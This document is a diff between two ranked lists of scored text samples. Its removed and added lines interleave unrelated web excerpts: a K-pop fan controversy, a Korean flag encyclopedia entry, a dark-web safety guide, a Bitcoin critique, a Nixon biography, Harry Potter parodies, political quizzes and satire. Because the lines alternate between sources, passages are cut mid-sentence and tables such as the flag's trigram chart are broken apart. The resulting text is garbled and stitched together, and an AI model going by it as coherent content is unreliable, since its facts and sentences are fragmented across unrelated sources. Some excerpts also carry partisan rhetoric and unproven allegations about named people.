and the party was low on funds. There was little corporate support for the party and many influential backers were waiting to see whether the Alliance could really replace the Progressive Conservatives as a centre-right alternative to the Liberals. Day fought that campaign on a shoestring, with family members playing key roles in the process. -“We would offer the following advice to techno DJs,” the statement continued. “Techno Snobbery is a condition that can often show no symptoms for many years, yet it has been documented that it can emerge suddenly at any time due to the slightest provocation. Therefore, techno DJs should remember that genre categorisations are largely permeable and superfluous, and that a fan referring to their music as Tech-House is therefore not a derogatory comment and can, in some circumstances +The Conservative party is having more and more difficulty recruiting volunteers at the riding level. Even campaign stalwarts who show up for every election are finding reasons to stay home this time. Who ================================================================================ -Rank = 90; Score = 3948544.0 -<|begin_of_text|>A few days ago, I wrote about one of the dumbest supposedly major controversies in a while, which was one SEVENTEEN member supposedly telling a fan that she was basically his source of income and two others saying that she was a fan of another member. I figured that would be sorta it (because I am a dumbass) since it was either: 1) Fabricated 2) A joke 3) Telling the truth. However, of course things started to snowball because the accusation had to do with disrespect from an idol to a fan. +Rank = 93; Score = 2056192.0 +<|begin_of_text|>"Taegukgi" and "Taegeukgi" redirect here. For the 2004 South Korean movie, see Taegukgi (film) -SEVENTEEN fans ended up claiming it was fabricated because Seungkwan‘s signature looks different, but as far as I’m concerned there was nothing conclusive about that. Of course, the same applies to the accuser’s clarifications, which don’t actually prove anything either, yet people are taking her story as solid evidence for whatever reason. +Republic of Korea Name Taegukgi / Taegeukgi -As far as I see it, we’re thus basically back to the battle of narratives. Yet the reason I’m skeptical of her side of the story is that there was a recording she made with Jeonghan that was supposed to make him some kind of dickhead. +(Hangul: 태극기 ) -Fansite recording of Junghan +(Hanja: 太極旗 Use National flag and ensign Proportion 2:3 Adopted January 27, 1883 (original version, used by the Joseon dynasty) -Fan: Today’s dress code… +June 29, 1942 (Provisional Government of the Republic of Korea) -Junghan: Stop coming here. +October 15, 1949 (as the flag of South Korea) [1] -Fan: (2 seconds pause) Huh…? OK.. But I keep getting picked though. +May 30, 2011 (current version) Design A white field with a red and blue taegeuk in the center that is surrounded by four varying groups of short black bars toward each corner Variant flag of Republic of Korea Use Naval jack -Junghan: Then other fans can’t come. Stop coming. +The flag of South Korea, also known as the Taegukgi (also spelled as Taegeukgi, literally "supreme ultimate flag"), has three parts: a white rectangular background, a red and blue Taegeuk, symbolizing balance, in its center, and four black trigrams selected from the original eight, one toward each corner. -What an asshole, right? +Symbolism [ edit ] -But the reality of that exchange was basically what I thought the Seungkwan incident was all about, which was idols joking around with fans who show up all the time. +The flag's background is white, a traditional color in Korean culture. White was common in the daily attire of 19th-century Koreans, and it still appears in contemporary versions of traditional Korean garments, such as the hanbok. The color represents peace and purity.[2] -일 끝내자마자 음성찾아서 올려드립니다. +The circle in the middle is derived from the philosophy of um-yang (yin-yang from China) and represents balance in the universe. The red half represents positive cosmic forces, and the blue half represents the opposing negative cosmic forces. -통으로 잘랐으며 어떻게 하든 주작 소리 +Together, the trigrams represent movement and harmony as fundamental principles. Each trigram (hangeul: 괘 [gwae]; hanja: 卦) represents one of the four classical elements,[3] as described below: -나오니깐 이거라도 주작이 아니라는걸 밝히기위해 변조없이 생으로 올려드립니다. +Trigram Korean name Celestial body Season Cardinal direction Virtue Family Natural element Meaning ☰ geon -(151101 용산팬싸)음성 듣고 알아서 판단하세요. 그리고 고소해 역고소할만큼 이게 팩트니깐. pic.twitter.com/p2l9vw230S — 햄니 (@96519kg) March 22, 2017 +( 건 / 乾 heaven -Everybody can have their own interpretation of that exchange, but I definitely see it as two people who recognize each other shooting the shit and not some malicious attack. And once that tone is established between them, it’s harder for me to believe Seungkwan wasn’t joking around -================================================================================ -Rank = 91; Score = 3899392.0 -<|begin_of_text|>First they said the downing of Russian Metrojet Flight 9268 was most likely due to Russia’s “notorious” regional airlines, which supposedly are rickety and unreliable. The Egyptian government denied that terrorism is even a possibility, with Egyptian despot Abdel Fatah al-Sisi proclaiming: +( 천 / 天 spring -“When there is propaganda that it crashed because of Isis, this is one way to damage the stability and security of Egypt and the image of Egypt. Believe me, the situation in Sinai – especially in this limited area – is under our full control.” +( 춘 / 春 east -However, it soon came out that the person in charge of Sharm el-Sheikh airport, where the Russia plane had landed before taking off again, had been “replaced” – oh, but not because of anything to do with the downing of the Russian passenger plane! As the Egyptian authorities put it: +( 동 / 東 humanity -“Adel Mahgoub, chairman of the state company that runs Egypt’s civilian airports, says airport chief Abdel-Wahab Ali has been ‘promoted’ to become his assistant. He said the move late Wednesday had nothing to do with media skepticism surrounding the airport’s security. Mahgoub said Ali is being replaced by Emad el-Balasi, a pilot.” +( 인 / 仁 father -Laughable, albeit in a sinister way, and yet more evidence that something wasn’t quite right: after all, everyone knows the Egyptian government does not have the Sinai, over which the plane disintegrated in mid air, under its “full control.” ISIS, which claimed responsibility for the crash hours after it occurred, is all over that peninsula. +( 부 / 父 heaven -Still, the denials poured in, mostly from US government officials such as Director of National Intelligence James “Liar-liar-pants-on-fire” Clapper, who said ISIS involvement was “unlikely.” Then they told us it couldn’t have been ISIS because they supposedly don’t have surface-to-air missiles that can reach the height attained by the downed plane. Yet that wasn’t very convincing either, because a) How do they know what ISIS has in its arsenal?, and b) couldn’t ISIS or some other group have smuggled a bomb on board? +( 천 / 天 justice -The better part of a week after the crash, we have this: +( 정의 / 正義 ) ☲ ri -“Days after authorities dismissed claims that ISIS brought down a Russian passenger jet, a U.S. intelligence analysis now suggests that the terror group or its affiliates planted a bomb on the plane. +( 리 / 離 sun -“British Foreign Minister Philip Hammond said his government believes there is a ‘significant possibility’ that an explosive device caused the crash. And -================================================================================ -Rank = 92; Score = 3899392.0 -<|begin_of_text|>The recent extraordinary runup and commensurate volatility in the price of Bitcoin has intensified global attention on the cybercurrency. For good or ill, Bitcoin is now a topic of interest to the mainstream press, as Bitcoin newbies near and far take notice. +( 일 / 日 autumn + +( 추 / 秋 south -Such newbies and reporters alike have nowhere to turn for information on Bitcoin than the established cadre of Bitcoin fans (some would say fanatics) who helped to drive its price to the stratosphere in the first place. +( 남 / +================================================================================ +Rank = 94; Score = 2031616.0 +<|begin_of_text|>How to enter the dark web safely: a step-by-step guide -Just one problem: many of these fans are spouting misinformation – and worse, they believe their own nonsense. +DeepWatch Blocked Unblock Follow Following Jun 7, 2017 -For you fanatics (you know who you are) as well as the broader newbie audience suddenly interested in Bitcoin, here are some of the lies Bitcoin fans tell themselves – and how to avoid getting snookered yourself. +We at DeepWatch monitor illegal activities in the deep web. Our clients may from time to time examine the identified evidence themselves. This article helps them in the process. -Lie #1: Bitcoin is Like Something Else +So, you’ve heard of the “dark web” or “darknet”, a hidden internet infamous for hosting illegal activities. You may wonder what it actually looks like. Or your organization recently got hit by data breach and you want to look into it yourself. -This fallacy is so prevalent, frankly, because Bitcoin really isn’t much like anything else. There are some similarities between Bitcoin and, say, the US dollar or gold or even tulips, but the differences far outweigh the similarities. +You’ve probably also heard the dark web is a dangerous place, one that only an intelligence officer can get in and out of without losing a finger or two. -Drawing a false comparison between dissimilar things is an example of the false analogy, false comparison, or false equivalence fallacy, and there’s even a Wikipedia page that explains it. +Is it true? -Here is a common example: when I say that criminals use Bitcoin for illicit transactions, a common response is ‘well, criminals use US currency for illicit transactions as well, so you shouldn’t single out Bitcoin.’ This line of reasoning is fallacious, because Bitcoin and US currency are too dissimilar to draw such a conclusion. +As it turns out, interacting with the dark web can be a relatively safe process even if you are not a security expert. To enter the dark web safely, we recommend this “super onion” setup as a reasonable approach to prevent bad guys from 1) Knowing who you are, 2) Attacking your computer, and 3) Stealing your data: -Lie #2: Bitcoin is Secure +Why we call it a Super Onion? Because it’s composed of multiple layers with Tor Browser at its core. -Bitcoin is a cryptocurrency and ‘crypto’ means secure, right? Not so fast. Bitcoin has proven appallingly easy to steal, and even easier to lose. +Be daunted by this epic onion not. In this article, we will explain how to build it layer by layer. It’s easier than you might think. -Security, after all, is like a game of whack-a-mole. Hit one vulnerability on the head and another pops up. There are still far too many moles all too happy to stick their heads through holes in the Bitcoin threat surface for my liking. +Prerequisites: You are computer savvy. You understand no security solution is 100% safe. You aren’t going to do any illegal stuff — our method is not designed for escaping law enforcement. -Lie #3: Bitcoin is Money +Make sure to follow each and every step. Do not skip them or change their order. Your system could become vulnerable otherwise. -Take a $20 bill and put it under your mattress. Wait ten years and retrieve it. What is it worth? $20, of course. Sure, inflation will have likely reduced its value somewhat, but $20 will always be $20. Such is the nature of money. +Let’s go. -Not so with Bitcoin. It’s more of a commodity that acts as a speculative vehicle, while exhibiting few of the properties of money. +Step 1/3: Secure your operating system. Create a surfer account -At this point, Bitcoin fans +Update your operating system (OS) and applications. Windows users: Free tools that automatically manage software updates come in handy. Turn on firewalls. See instructions for Windows, Mac OS X, and Ubuntu. Turn on full-disk encryption. See instructions for Windows, Mac OS X, and Ubuntu. This is to prevent file system data from leaking into the virtual machine (VM) which will be introduced shortly. Use strong passwords for all OS accounts. Disable auto-login. Create a non-administrative account on your OS. Let’s call it a “surfer account”. It will be used exclusively for dark web surfing. Make sure to never visit your own websites, type out your name, or do anything that may reveal your identity on this ================================================================================ -Rank = 93; Score = 3883008.0 -<|begin_of_text|>South Park ending: After defeating Voldemort, Harry and Ron address the audience, saying, “You know, I’ve learned something today.” Suddenly, Ginny is run over by the Knight Bus, prompting Ron to shout, “They killed Ginny!” Harry responds, “You bastards!” Neville laughs and says it’s because Ginny was poor. +Rank = 95; Score = 2023424.0 +<|begin_of_text|>In the unattainable quest for leftist-deemed inclusivity, a Catholic school in California is purging itself of all remnants of Catholicism, including a statue of baby Jesus and the Virgin Mary. + +On Thursday, Marinij.com reported that San Domenico School in San Anselmo, California, had removed and relocated a number of Catholic statues in order to be more inclusive of other religions, sparking strong reactions from parents of students who attend the allegedly Catholic school. + +Thus far, the school has removed and relocated all but 18 of their 180 Catholic icons and statues. The head of the school's board of trustees, Amy Skewes-Cox, claims such removals are “completely in compliance” with school rules, which were approved by the board and the Dominican Sisters of San Rafael last year. + +Kim Pipki, whose daughter used to attend San Domenico, recalled the removal of the statue of baby Jesus and Mary as particularly contentious. + +“The one main statue that has everyone fired up is the baby Jesus and Mary one,” said Pipki. “It was at the center of the primary school courtyard.” + +“It was less about God and more about passing on some traditions,” the mother noted. “People were shocked that the statues were pitched in the basement.” -Star Wars ending: Voldemort reveals himself to in fact be Harry’s father. +Shannon Fitzpatrick, whose eight-year-old daughter currently attends Domenico, wrote an email to school officials and the Dominican Sisters of San Rafael expressing her disapproval of the so-called inclusive changes, suggesting their version of "inclusion" apparently means gutting Catholicism from the school altogether. -CSI: Miami ending: Harry, Ron and Hermione collect evidence linking Voldemort to the murder of Albus Dumbledore. When confronted, Voldemort challenges Harry to prove he did it; Harry puts on his sunglasses, holding up a single strand of Voldemort’s hair, responds, “I don’t have to, you already did.” +“Articulating an inclusive foundation appears to mean letting go of San Domenico’s 167-year tradition as a Dominican Catholic school and being both afraid and ashamed to celebrate one’s heritage and beliefs,” wrote Fitzpatrick. -24 ending: It is revealed that Voldemort was really just working for the French, and Madame Maxime was really behind the entire plot to destroy the wizarding world. At the last second, Harry is able to diffuse the device Maxime had planted that would neutralize all wizard’s power in all of England. Just as they begin to celebrate, Harry is captured by the Chinese and when we last see him, he is on a boat to China. +“In our time here, the word ‘Catholic’ has been removed from the mission statement, sacraments were removed from the curriculum, the lower school curriculum was changed to world religions, the logo and colors were changed to be ‘less Catholic,’ and the uniform was changed to be less Catholic," she continued. -Brokeback Mountain ending: After wishing he could “quit him,” Harry finally finds out that Draco was beaten to death with wands by a group of angry Deatheaters. The book closes with Harry gazing longingly into his trunk, in which he has Draco’s Slytherin robe wrapped around his own Invisibility Cloak. Harry mumbles, “I swear, Draco.” and sheds a single tear. +The mother said she first became alarmed by the school's changes last year, when San Domenico removed “first reconciliation and first communion from the second-grade curriculum." -Lord of the Rings ending: Harry and Ron finally destroy the final horcrux by throwing it into a bubbling lave pit deep beneath Hogwarts, killing Lord Voldemort in the process, but at the same time weakening the foundations of Hogwarts, trapping Harry and Ron miles beneath the surface. where they gaze into each others eyes, too afraid to talk of the love that dare not speak it’s name. Just as they pass out, Fawkes rescues them and they both live out their lives married to their respective spouses +In a follow-up email, Fitzpatrick noted that she was not the only parent disturbed by the "inclusive" changes. -A Few Good Men ending: In the process of defeating Lord Voldemort, Ron and Hermione accidentally kill Draco. They are brought to trial before the Wizengamut, and Harry must act as their lawyer. Harry believes that Ron and Hermione were only following orders from Percy, and so he calls Percy to the stand. After a few hours of intense questioning, Harry finally tricks Percy into admitting he ordered the attack on Malfoy. As +“There are other families having the same concerns I do. Many parents feel if the school is heading in a different direction then the San Domenico community should ================================================================================ -Rank = 94; Score = 3883008.0 +Rank = 96; Score = 2023424.0 <|begin_of_text|>Tech / Help Deep dive: What makes the Demon so wicked? @@ -2116,97 +2164,119 @@ Induction system The Air Grabber Hood is a functional hood scoop system which feeds a high volume of cold air to the airbox, along with dual air catchers in the grille (replacing the fog lights) — all feeding the 14. ================================================================================ -Rank = 95; Score = 3817472.0 -<|begin_of_text|>The flag decals that were ordered taken down by Chief Bronaugh. Photographs courtesy Maywood Fire Department. +Rank = 97; Score = 2023424.0 +<|begin_of_text|>Richard M. Nixon 37th President of the United States Term of office January 20, 1969 – August 9, 1974 Preceded by Lyndon B. Johnson Succeeded by Gerald Ford Date of birth January 9, 1913 Place of birth Yorba Linda, California Date of death April 22, 1994 Place of death New York, New York Spouse Patricia Ryan Nixon Political party Republican + +Richard Milhous Nixon (January 9, 1913 – April 22, 1994) was the 37th President of the United States, serving from 1969 to 1974. He was also the 36th Vice President, serving under Dwight D. Eisenhower. Nixon redefined the office of Vice President, making it for the first time a high visibility platform and base for a presidential candidacy. He is the only person to have been elected twice to the Vice Presidency and twice to the Presidency, and the only president to have resigned that office. His resignation came after advisement of imminent impeachment related to the Watergate break-in and subsequent Watergate scandal. + +Nixon is noted for his diplomatic foreign policy, especially with the Soviet Union and China, and his efforts to end the Vietnam War. He is also noted for his middle-of-the-road domestic policy that combined conservative rhetoric and, in many cases, liberal action, as in his environmental policy. -Tuesday, September 9, 2014 || By Michael Romain +As president, Nixon imposed wage and price controls, indexed Social Security for inflation, and created Supplemental Security Income. The number of pages added to the Federal Register each year doubled under Nixon. He advocated gun control, reduced speed limits, and eradicated the last remnants of the gold standard. Nixon created the Environmental Protection Agency and Occupational Safety and Health Administration and implemented the Philadelphia Plan, the first significant federal affirmative action program. -Today, four Maywood firefighters were sent home, pending disciplinary action, for failure to comply with a direct order, according to Chief Craig Bronaugh. A CBS Local report noted that more firefighters could be sent home tomorrow. The firefighters apparently refused to remove American flag decals from their lockers and helmets. +In his later years, Nixon worked to rehabilitate his public image, and he enjoyed considerably more success than could have been anticipated at the time of his resignation. He gained great respect as an elder statesman in the area of foreign affairs, being consulted by both Democratic and Republican successors to the Presidency, and wrote several highly-regarded books. -“A representative from Service Employees International Union Local 73, which represents the firefighters, met for an hour with Chief Bronaugh Tuesday afternoon, with the union hoping Chief Bronaugh would modify his order. Instead, he ordered the firefighters sent home immediately, pending disciplinary action,” according to the CBS report. +Early years -“Union spokesman Adam Rosen said he is ‘shocked’ that an agency of first responders would enforce such an order the week of Sept. 11. +Richard Nixon was born in Yorba Linda, California, to Francis A. Nixon and Hannah Milhous Nixon in a house his father built from a kit purchased from Sears, Roebuck. He was raised by his mother as an evangelical Quaker. His upbringing is said to have been marked by conservative evangelical Quaker observances, like refr +================================================================================ +Rank = 98; Score = 2023424.0 +<|begin_of_text|>EXPERTS have stressed that of course America is genuinely stupid enough to elect a deranged murder clown as its president. -“The four suspended firefighters said they were told that the order was issued because of racial discord [in] the department. The four, who include two white firefighters, a black firefighter, and a fourth firefighter who is a Cuban émigré, said no such problems exist,” wrote CBS, which also reported that the four firefighters trace the issue “to a decision by several firefighters to replace a tattered American flag last month in one of Maywood’s firehouses. The new flag mysteriously disappeared early Aug. 23. The order on decals was issued last week.” +Professor Henry Brubaker, from the Institute for Studies, said: “The question ‘are Americans really stupid enough to do this?’ is, in itself, fairly idiotic. -Although the CBS report indicates that the department “has had no such order in the recent past,” an internal memo released by the Office of Chief Bronaugh noted that this kind of conflict has nonetheless appeared before: +“In recent years, thanks to some very well made television programmes like Breaking Bad and House of Cards, we may have led ourselves to believe that America is more intelligent than it actually is. -Under no circumstances at anytime are there to be decals/stickers on Fire Department lockers or helmets. Any decals/stickers are to be removed immediately. No inquiry will be entertained regarding this matter. +“More than half the population believes in some form of creationism. More. Than. Half. -TO BE READ AT ALL ROLL CALLS THRU SEPTEMBER 10, 2014 +“Meanwhile, many of them are unable to locate their own state on a map, never mind large, well known foreign countries. -This was in response to an inquiry regarding an American Flag being put up in the fire station (replacing a torn and tattered flag that previously existed). That flag was stolen on the very next shift day. Firefighters were upset that the flag was stolen and in response placed American Flag decals on their personal lockers in the stations. +“And then there’s the guns. So many fucking guns. It’s how a great many of them define themselves. That is not a good thing to do with your brain.” -This is not the first time that a flag incident has occurred in the Maywood Fire Department. Approximately 10 years ago, all American Flag decals were removed from all of the department vehicles and +He added: “Anyway, have a lovely evening.”<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 96; Score = 3768320.0 -<|begin_of_text|>$\begingroup$ +Rank = 99; Score = 2007040.0 +<|begin_of_text|>6. Speaking at a livestock auction barn in Iowa, Hillary Clinton said she expected voters to inspect her, and offered: -Sam sat with his eyes closed for several minutes, then said softly: +A) “You can look inside my mouth if you want.” -"I have many names, and none of them matter." He opened his eyes slightly then, but he did not move his head. He looked upon nothing in particular. +B) “You can take a gander at my withers.” -"Names are not important," he said. "To speak is to name names, but to speak is not important. A thing happens once that has never happened before. Seeing it, a man looks on reality. He cannot tell others what he has seen. Others wish to know, however, so they question him saying, 'What is it like, this thing you have seen?' So he tries to tell them. Perhaps he has seen the very first fire in the world. He tells them, 'It is red, like a poppy, but through it dance other colors. It has no form, like water, flowing everywhere. It is warm, like the sun of summer, only warmer. It exists for a time on a piece of wood, and then the wood is gone, as though it were eaten, leaving behind that which is black and can be sifted like sand. When the wood is gone, it too is gone.' Therefore, the hearers must think reality is like a poppy, like water, like the sun, like that which eats and excretes. They think it is like to anything that they are told it is like by the man who has known it. But they have not looked upon fire. They cannot really know it. They can only know of it. But fire comes again into the world, many times. More men look upon fire. After a time, fire is as common as grass and clouds and the air they breathe. They see that, while it is like a poppy, it is not a poppy, while it is like water, it is not water, while it is like the sun, it is not the sun, and while it is like that which eats and passes wastes, it is not that which eats and passes wastes, but something different from each of these apart or all of these together. So they look upon this new thing and they make a new word to call it. They call it 'fire.' +C) “You can examine the stock I came from.” -"If they come upon one who still has not seen it and they speak to him of fire, he does not know what they mean. So they, in turn, fall back upon telling him what fire is like. As they do, they know from their own experience that what they are telling him is -================================================================================ -Rank = 97; Score = 3768320.0 -<|begin_of_text|>Question Answer Episode Marshall hits Lily with what after he proposes? Pilot Thing Ted pretends he is buying at the store? Purple Giraffe Barney's luggage contains? Sweet Taste of Liberty Name one of the things Ted fondly remembers about Natalie. Return of the Shirt Barney says that there are 24 similarities between women and what? Okay Awesome The Slutty Pumpkin's drink? Slutty Pumpkin Unusual creature in Ted and Marshall's apartment? Matchmaker Place Lily's apartment has been turned into? The Duel Sport Marshall's family has created? Belly Full of Turkey Name of the shot that Carl creates? The Pineapple Incident 'Celebrity' that joins the gang on New Years? The Limo First thing that Marshall and Lily agree about for the wedding? The Wedding Fake name Victoria uses? Drumroll, Please 'I want to know you, like _____ _____ _____.' Zip, Zip, Zip What Barney refers to Ted's embarrassing story as? Game Night Where is Marshall's dream internship? Cupcake The song Marshall and Lily sing? Life Among the Gorillas Who do Marshall, Lily, and Barney hang out with? Nothing Good Happens After 2 AM Cutout Ted and Marshall use on Sandy? Mary the Paralegal What Scooter wants to be? Best Prom Ever What Robin shows Ted to cheer him up? Milk What Ted does to stop Robin's camping trip? Come On The pet George Clinton buys Lily? Where Were We? What Ted orders to cure his hangover? The Scorpion and the Toad What Ted and his dad talk about if things get uncomfortable? Brunch Movie Ted is mad that Robin dislikes? Ted Mosby, Architect Concert Marshall and Brad go to? World's Greatest Couple Who plays the Cougar? Aldrin Justice Show the end of the episode reference? Swarley What Barney has to find to win the game? Atlantic City Name of Robin's hit single? Slap Bet What James does that reveals he's in a relationship? Single Stamina Word that Ted calls Lily? How Lily Stole Christmas Where the gang takes Robin's sister? First Time in New York Name of Ted's annoying ex-boss? Columns Who Barney bumps into on the street? Monday Night Football Where is Ted's interview? Lucky Penny Name of Barney's one-man show? Stuff Name of the song that the Fiero plays? Arrivederci, Fiero One of the names that Barney gives the truck in his Top Ten List Moving Day What Lily's grandmother gives her at the bridal shower? Bachelor Party Show Barney appears on? Showdown -================================================================================ -Rank = 98; Score = 3719168.0 -<|begin_of_text|>Rodrigo Varela/ESPN Images Have you ever seen Stugotz at Hooters? Have you ever seen Stugotz at Hooters? +7. Ratcheting it up in New Hampshire, Romney charged Giuliani with being: -Midwest Region +A) A person in a glass house who throws stones -#1) Kentucky: Jeff Van Gundy - Queen of Hearts +B) A rolling stone who gathers no moss -#2) Kansas: George Karl- Leader of a nudist colony +C) A twice-divorced, thrice-married ferret-hater -#3) Notre Dame: Nene - Looks like a gladiator that will help you slay a tiger then join you as you embark on a quest +8. Giuliani retorted that Romney was: -#4) Maryland: J.J. Redick - Sketchy car valet who might take your car for a joy ride +A) A person in a glass house who throws stones -#5) West Virginia: Mike Dunleavy Jr. - Looks like a generic police sketch +B) A rolling stone who gathers no moss -#6) Butler: Andy Reid - Looks like he waggles his fingers in front of a tray of doughnuts and says, "Don't mind if I do" +C) A flip-flopping ferret lover -#7) Wichita State: Marcin Gortat - Guy who becomes a YouTube sensation by wrestling bears shirtless +9. Somewhere along the line, reporters have noticed, Hillary Clinton dropped: -#8) Cincinnati: Kris Humphries - Looks like a male cheerleader +A) Bill -#9) Purdue: Russell Wilson - Looks like a male cheerleader +B) The Celine Dion theme song -#10) Indiana: Jerry Sloan - Looks like he washes his hair with a bar of soap +C) The black pantsuit -#11) Texas: David Shaw - Looks like the president in a cable television network drama +10. Texas Gov. Rick Perry endorsed Rudy Giuliani by comparing him to: -#12) Buffalo: Nick Saban - Guy who runs a lap, looks at his stopwatch and says, "Still go it," while snapping his fingers +A) A great stallion with one sore hoof -#13) Valparaiso: Frank Vogel - Guy who keeps calling you to hang out and you keep creating excuses not to go +B) A pickup truck with one undesirable option -#14) Northeastern: Trey Wingo - Looks like a guy who owns a funeral home and does late-night infomercials promoting his seasonally discounted rates +C) A great date with bad breath -#15) New Mexico State: DeAndre Jordan - Looks like a cartoon moose +Newsletter Sign Up Continue reading the main story Please verify you're not a robot by clicking the box. Invalid email address. Please re-enter. You must select a newsletter to subscribe to. Sign Up You will receive emails containing news content, updates and promotions from The New York Times. You may opt-out at any time. You agree to receive occasional updates and special offers for The New York Times's products and services. Thank you for subscribing. An error has occurred. Please try again later. View all New York Times newsletters. -#16) Hampton: Chip Kelly - Looks like the guy who leaves comically low tips to service people, then shoots the finger gun and says, "Don't spend it all in one place" +11. BEYOND BARBRA AND OPRAH: Match the candidate with the celebrity backer. -#16) Manhattan: Chip Kelly - Looks like the guy who washes his yacht shirtless +A) “Nature Boy” Ric Flair -West Region +B) Kevin Bacon -#1) Wisconsin: Ron Rivera - Guy who wears a lei for his entire vacation in Hawaii +C) Forest Whitaker -#2) Arizona: Jack Del Rio - Stepdad who tries too hard to be called dad +D) The Osmonds -#3) Baylor: Orel Hershiser - Looks like the father in the picture of -================================================================================ -Rank = 99; Score = 3719168.0 -<|begin_of_text|>In an effort to encourage the development of Canadian programming that's more accessible to the iPod generation, the federal government is doing away with the controversial Canadian Television Fund. The fund, which is the source of taxpayer subsidies to the Canadian television production industry, will be combined with the Canada New Media Fund, which subsidizes digital media development starting April 1, 2010. +E) Melissa Gilbert -Online scams have now surpassed phone scams as a source of fraud. ( Shutterstock ) +F) Merle Haggard -The government will invest $134.7 million annually in the new program, called the Canada Media Fund, Heritage Minister James Moore said at a press conference today on the Toronto set of the CTV police drama series, Flashpoint. "We are levelling the playing field at a time when the industry is undergoing structural change," Moore said. "The eligibility for funding for broadcaster-affiliated production will be expanded, and broadcaster in-house production will be allowed... including provincial educational broadcasters and CBC/Radio-Canada." +G) Red Sox pitcher Curt Schilling -Article Continued Below +H) Pat Sajak + +I) Sean Penn + +1) Hillary Clinton + +2) Barack Obama + +3) John Edwards + +4) Rudy Giuliani + +5) Dennis Kucinich + +6) Mike Huckabee + +7) Fred Thompson + +8) John McCain + +9) Mitt Romney + +12. When asked if he ever inhaled, Barack Obama said: + +A) “I’m not going to talk about what I did as a child.” -The emphasis of the new broadcast policy will be on drama, comedy, and children's programming, and will favour productions developed for distribution platforms other than prime-time television – the Internet and mobile telecommunications devices, said 